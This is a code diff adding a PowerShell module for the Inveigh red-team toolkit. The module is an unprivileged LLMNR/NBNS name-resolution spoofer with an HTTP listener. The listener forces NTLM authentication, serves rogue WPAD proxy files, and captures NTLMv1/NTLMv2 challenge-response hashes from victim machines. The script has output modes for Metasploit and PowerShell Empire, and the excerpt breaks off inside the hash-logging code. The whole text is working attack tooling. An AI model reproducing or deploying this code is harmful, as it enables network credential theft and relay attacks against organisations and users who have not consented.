+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADEmptyFile = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$HTTPAuth = "NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM")][String]$WPADAuth = "NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"),
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
+    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+    [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
+    [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
+    [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
+    [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "",
+    [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "",
+    [parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
+    [parameter(Mandatory=$false)][Int]$HTTPPort = "80",
+    [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "",
+    [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30",
+    [parameter(Mandatory=$false)][Int]$NBNSTTL = "165",
+    [parameter(Mandatory=$false)][Int]$WPADPort = "",
+    [parameter(Mandatory=$false)][Int]$RunCount = "",
+    [parameter(Mandatory=$false)][Int]$RunTime = "",
+    [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
+    [parameter(Mandatory=$false)][String]$HTTPResponse = "",
+    [parameter(Mandatory=$false)][String]$WPADResponse = "",   
+    [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD",
+    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+    throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module."
+}
+
+if($NBNSBruteForce -eq 'Y')
+{
+    $NBNS = 'N'
+    $LLMNR = 'N'
+}
+
+if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget)
+{
+    throw "You must specify a -NBNSBruteForceTarget if enabling -NBNSBruteForce"
+}
+
+if(!$SpooferIP)
+{
+    $SpooferIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)  
+}
+
+if($WPADIP -or $WPADPort)
+{
+
+    if(!$WPADIP)
+    {
+        throw "You must specify a -WPADPort to go with -WPADIP"
+    }
+
+    if(!$WPADPort)
+    {
+        throw "You must specify a -WPADIP to go with -WPADPort"
+    }
+
+}
+
+if(!$OutputDir)
+{ 
+    $output_directory = $PWD.Path
+}
+else
+{
+    $output_directory = $OutputDir
+}
+
+if(!$inveigh)
+{
+    $global:inveigh = [HashTable]::Synchronized(@{})
+    $inveigh.log = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
+    $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+}
+
+if($inveigh.unprivileged_running)
+{
+    throw "Invoke-InveighUnprivileged is already running, use Stop-Inveigh"
+}
+
+if(!$inveigh.running -or !$inveigh.relay_running)
+{
+    $inveigh.console_queue = New-Object System.Collections.ArrayList
+    $inveigh.status_queue = New-Object System.Collections.ArrayList
+    $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+    $inveigh.certificate_application_ID = $HTTPSCertAppID
+    $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
+    $inveigh.console_output = $false
+    $inveigh.console_input = $true
+    $inveigh.file_output = $false
+    $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+    $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+    $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+    $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+}
+
+$inveigh.hostname_spoof = $false
+$inveigh.unprivileged_running = $true
+
+if($StatusOutput -eq 'Y')
+{
+    $inveigh.status_output = $true
+}
+else
+{
+    $inveigh.status_output = $false
+}
+
+if($OutputStreamOnly -eq 'Y')
+{
+    $inveigh.output_stream_only = $true
+}
+else
+{
+    $inveigh.output_stream_only = $false
+}
+
+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
+{
+    $inveigh.tool = 1
+    $inveigh.output_stream_only = $true
+    $inveigh.newline = ""
+    $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
+    $inveigh.tool = 2
+    $inveigh.output_stream_only = $true
+    $inveigh.console_input = $false
+    $inveigh.newline = "`n"
+    $ConsoleOutput = "Y"
+    $ShowHelp = "N"
+}
+else
+{
+    $inveigh.tool = 0
+    $inveigh.newline = ""
+}
+
+# Write startup messages
+$inveigh.status_queue.Add("Inveigh Unprivileged started at $(Get-Date -format 's')") > $null
+$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Unprivileged started")])  > $null
+
+if($StartupChecks -eq 'Y')
+{
+    $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+}
+
+if($firewall_status)
+{
+    $inveigh.status_queue.Add("Windows Firewall = Enabled")  > $null
+
+    $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
+    $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
+
+    if($firewall_powershell)
+    {
+        $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed")  > $null
+    }
+
+}
+
+if($LLMNR -eq 'Y')
+{
+    if($StartupChecks -eq 'Y')
+    {
+        $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 "
+    }
+
+    if(!$LLMNR_port_check)
+    {
+        $inveigh.status_queue.Add("LLMNR Spoofer = Enabled")  > $null
+        $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds")  > $null
+        $LLMNR_response_message = "- response sent"
+    }
+    else
+    {
+        $LLMNR = "N"
+        $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355")  > $null
+    }
+}
+else
+{
+    $inveigh.status_queue.Add("LLMNR Spoofer = Disabled")  > $null
+    $LLMNR_response_message = "- LLMNR spoofer is disabled"
+}
+
+if($NBNS -eq 'Y')
+{
+    $NBNSTypes_output = $NBNSTypes -join ","
+    
+    if($NBNSTypes.Count -eq 1)
+    {
+        $inveigh.status_queue.Add("NBNS Spoofer For Type $NBNSTypes_output = Enabled")  > $null
+    }
+    else
+    {
+        $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled")  > $null
+    }
+
+    $NBNS_response_message = "- response sent"
+}
+else
+{
+    $inveigh.status_queue.Add("NBNS Spoofer = Disabled")  > $null
+    $NBNS_response_message = "- NBNS spoofer is disabled"
+}
+
+if($NBNSBruteForce -eq 'Y')
+{   
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer Target = $NBNSBruteForceTarget") > $null
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer IP Address = $SpooferIP") > $null
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer Hostname = $NBNSBruteForceHost") > $null
+
+    if($NBNSBruteForcePause)
+    {
+        $inveigh.status_queue.Add("NBNS Brute Force Pause = $NBNSBruteForcePause Seconds") > $null
+    }
+
+}
+else
+{
+    $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null
+}
+
+if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y')
+{
+    $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null
+}
+
+if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer Hosts Reply = " + ($SpooferHostsReply -join ","))  > $null
+}
+
+if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer Hosts Ignore = " + ($SpooferHostsIgnore -join ","))  > $null
+}
+
+if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer Ips Reply = " + ($SpooferIPsReply -join ",")) > $null
+}
+
+if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y'))
+{
+    $inveigh.status_queue.Add("Spoofer IPs Ignore = " + ($SpooferIPsIgnore -join ","))  > $null
+}
+
+if($SpooferRepeat -eq 'N')
+{
+    $inveigh.spoofer_repeat = $false
+    $inveigh.status_queue.Add("Spoofer Repeating = Disabled")  > $null
+}
+else
+{
+    $inveigh.spoofer_repeat = $true
+}
+
+if($HTTP -eq 'Y')
+{
+    
+    if($StartupChecks -eq 'Y')
+    {
+        $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"0.0.0.0:$HTTPPort "
+    }
+    elseif($HTTPIP -and $StartupChecks -eq 'Y')
+    {
+        $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$HTTPPort "
+    }
+
+    if($HTTP_port_check)
+    {
+        $HTTP = "N"
+        $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort")  > $null
+    }
+    else
+    {
+
+        if($HTTPIP)
+        {
+            $inveigh.status_queue.Add("HTTP IP Address = $HTTPIP") > $null
+        }
+
+        if($HTTPPort -ne 80)
+        {
+            $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null
+        }
+
+        $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null
+        $inveigh.status_queue.Add("HTTP Authentication = $HTTPAuth") > $null
+        $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
+
+        if($HTTPResponse)
+        {
+            $inveigh.status_queue.Add("HTTP Custom Response = Enabled") > $null
+        }
+
+        if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic')
+        {
+            $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
+        }
+
+        if($WPADIP -and $WPADPort)
+        {
+            $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null
+
+            if($WPADDirectHosts)
+            {
+                $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null
+            }
+
+        }
+        elseif($WPADResponse -and !$WPADIP -and !$WPADPort)
+        {
+            $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
+        }
+        elseif($WPADEmptyFile -eq 'Y')
+        {
+            $inveigh.status_queue.Add("WPAD Default Response = Enabled")  > $null
+        }
+
+        if($Challenge)
+        {
+            $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null
+        }
+
+        if($MachineAccounts -eq 'n')
+        {
+            $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
+            $inveigh.machine_accounts = $false
+        }
+        else
+        {
+            $inveigh.machine_accounts = $true
+        }
+
+    }
+
+}
+else
+{
+    $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null
+}
+
+if($ConsoleOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+    $inveigh.console_output = $true
+
+    if($ConsoleStatus -eq 1)
+    {
+        $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute")  > $null
+    }
+    elseif($ConsoleStatus -gt 1)
+    {
+        $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes")  > $null
+    }
+
+}
+else
+{
+
+    if($inveigh.tool -eq 1)
+    {
+        $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
+    }
+    else
+    {
+        $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
+    }
+
+}
+
+if($ConsoleUnique -eq 'Y')
+{
+    $inveigh.console_unique = $true
+}
+else
+{
+    $inveigh.console_unique = $false
+}
+
+if($FileOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
+    $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
+    $inveigh.file_output = $true
+}
+else
+{
+    $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
+}
+
+if($FileUnique -eq 'Y')
+{
+    $inveigh.file_unique = $true
+}
+else
+{
+    $inveigh.file_unique = $false
+}
+
+if($RunTime -eq 1)
+{
+    $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
+}
+elseif($RunTime -gt 1)
+{
+    $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
+}
+
+if($RunCount)
+{
+    $inveigh.status_queue.Add("Run Count = $RunCount") > $null
+}
+
+if($ShowHelp -eq 'Y')
+{
+    $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Unprivileged") > $null
+        
+    if($inveigh.console_output)
+    {
+        $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
+    }
+
+}
+
+if($inveigh.status_output)
+{
+
+    while($inveigh.status_queue.Count -gt 0)
+    {
+
+        if($inveigh.output_stream_only)
+        {
+            Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+            $inveigh.status_queue.RemoveAt(0)
+        }
+        else
+        {
+
+            switch -Wildcard ($inveigh.status_queue[0])
+            {
+
+                "* Disabled Due To *"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                "Run Stop-Inveigh to stop Inveigh-Unprivileged"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                "Windows Firewall = Enabled"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                default
+                {
+                    Write-Output($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+            }
+
+        }
+
+    }
+
+}
+
+# Begin ScriptBlocks
+
+# Shared Basic functions ScriptBlock
+$shared_basic_functions_scriptblock =
+{
+
+    function DataLength2
+    {
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+        $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+        return $string_length
+    }
+
+    function DataLength4
+    {
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+        $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+        return $string_length
+    }
+
+    function DataToString
+    {
+        param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+
+        $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+        $string_data = $string_data -replace "-00",""
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+        return $string_extract
+    }
+
+}
+
+# HTTP Server ScriptBlock - HTTP listener
+$HTTP_scriptblock = 
+{ 
+    param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPIP,$HTTPPort,$HTTPResponse,$NBNSBruteForcePause,$WPADAuth,$WPADEmptyFile,$WPADIP,$WPADPort,$WPADDirectHosts,$WPADResponse,$RunCount)
+
+    function NTLMChallengeBase64
+    {
+        param ([String]$Challenge)
+
+        $HTTP_timestamp = Get-Date
+        $HTTP_timestamp = $HTTP_timestamp.ToFileTime()
+        $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp))
+        $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+        if($Challenge)
+        {
+            $HTTP_challenge = $Challenge
+            $HTTP_challenge_bytes = $HTTP_challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-')
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        }
+        else
+        {
+            $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+            $HTTP_challenge = $HTTP_challenge_bytes -replace ' ', ''
+            $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        }
+
+        $inveigh.HTTP_challenge_queue.Add($HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $HTTP_challenge)  > $null
+
+        $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38,
+                            0x00,0x00,0x00,0x05,0x82,0x89,0xa2 +
+                            $HTTP_challenge_bytes +
+                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06,
+                            0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00,
+                            0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54,
+                            0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,
+                            0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24,
+                            0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00,
+                            0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,
+                            0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,
+                            0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 +
+                            $HTTP_timestamp +
+                            0x00,0x00,0x00,0x00,0x0a,0x0a
+
+        $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
+        $NTLM = "NTLM " + $NTLM_challenge_base64
+        $NTLM_challenge = $HTTP_challenge
+        
+        return $NTLM
+    }
+
+    if($HTTPIP)
+    {
+        $HTTPIP = [System.Net.IPAddress]::Parse($HTTPIP)
+        $HTTP_endpoint = New-Object System.Net.IPEndPoint($HTTPIP,$HTTPPort)
+    }
+    else
+    {
+        $HTTP_endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::any,$HTTPPort)
+    }
+
+    $HTTP_running = $true
+    $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint
+    
+    try
+    {
+        $HTTP_listener.Start()
+    }
+    catch
+    {
+        $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")
+        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting HTTP listener")])
+        $HTTP_running = $false
+    }
+
+    $HTTP_WWW_authenticate_header = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20 # WWW-Authenticate
+    $run_count_NTLMv1 = $RunCount + $inveigh.NTLMv1_list.Count
+    $run_count_NTLMv2 = $RunCount + $inveigh.NTLMv2_list.Count
+    $run_count_cleartext = $RunCount + $inveigh.cleartext_list.Count
+
+    if($WPADIP -and $WPADPort)
+    {
+
+        if($WPADDirectHosts)
+        {
+
+            foreach($WPAD_direct_host in $WPADDirectHosts)
+            {
+                $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
+            }
+
+            $HTTP_WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
+        }
+        else
+        {
+            $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}"
+        }
+
+    }
+    elseif($WPADResponse)
+    {
+        $HTTP_WPAD_response = $WPADResponse
+    }
+    elseif($WPADEmptyFile -eq 'Y')
+    {
+        $HTTP_WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}"
+    }
+
+    $HTTP_client_close = $true
+
+    :HTTP_listener_loop while ($inveigh.unprivileged_running -and $HTTP_running)
+    {
+        $TCP_request = ""
+        $TCP_request_bytes = New-Object System.Byte[] 1024
+
+        while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
+        {
+
+            Start-Sleep -m 10
+
+            if(!$inveigh.unprivileged_running)
+            {
+                break HTTP_listener_loop
+            }
+        
+        }
+
+        if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.unprivileged_running)
+        {
+            $HTTP_client = $HTTP_listener.AcceptTcpClient() # will block here until connection 
+	        $HTTP_stream = $HTTP_client.GetStream()
+        }
+
+        $HTTP_stream_timeout = New-TimeSpan -Seconds 2
+        $HTTP_stream_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+
+        while($HTTP_stream.DataAvailable -and $HTTP_stream_stopwatch.Elapsed -lt $HTTP_stream_timeout)
+        {
+            $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
+        }
+
+        $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
+
+        if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*")
+        {
+            $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
+            $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+            $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
+
+            if($NBNSBruteForcePause)
+            {
+                $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+                $inveigh.hostname_spoof = $true
+            }
+
+            if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
+            {
+                $HTTP_authorization_header = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
+                $HTTP_authorization_header = $HTTP_authorization_header.Substring(0,$HTTP_authorization_header.IndexOf("-0D-0A-"))
+                $HTTP_authorization_header = $HTTP_authorization_header.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                $authentication_header = New-Object System.String ($HTTP_authorization_header,0,$HTTP_authorization_header.Length)
+            }
+            else
+            {
+                $authentication_header =  ""
+            }
+
+            if($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous')
+            {
+                $HTTP_response_status_code = 0x32,0x30,0x30
+                $HTTP_response_phrase = 0x4f,0x4b
+            }
+            else
+            {
+                $HTTP_response_status_code = 0x34,0x30,0x31
+                $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
+            }
+
+            $HTTP_type = "HTTP"
+            $NTLM = "NTLM"
+            $NTLM_auth = $false
+            $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
+
+            if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
+            {
+                $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
+                $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+            }
+
+            if($authentication_header.startswith('NTLM '))
+            {
+                $authentication_header = $authentication_header -replace 'NTLM ',''
+                [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header)
+                $HTTP_response_status_code = 0x34,0x30,0x31
+            
+                if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
+                {
+                    $HTTP_response_status_code = 0x34,0x30,0x31
+                    $NTLM = NTLMChallengeBase64 $Challenge
+                    $HTTP_client_close = $false
+                }
+                elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
+                {
+                    $NTLM = "NTLM"
+                    $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
+                    $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
+                    $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
+                    $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
+                    [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
+                    $HTTP_challenge_queue.Remove($NTLM_challenge)
+                    $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
+                       
+                    if($HTTP_NTLM_domain_length -eq 0)
+                    {
+                        $HTTP_NTLM_domain_string = ""
+                    }
+                    else
+                    {  
+                        $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
+                    } 
+                    
+                    $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
+                    $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
+                    $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
+                    $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
+                    $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
+                    $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
+        
+                    if($HTTP_NTLM_length -eq 24) # NTLMv1
+                    {
+                        $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
+                        $NTLM_response = $NTLM_response.Insert(48,':')
+                        $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
+                    
+                        if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
+                        {    
+                            $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP ($HTTP_NTLM_host_string)")])      
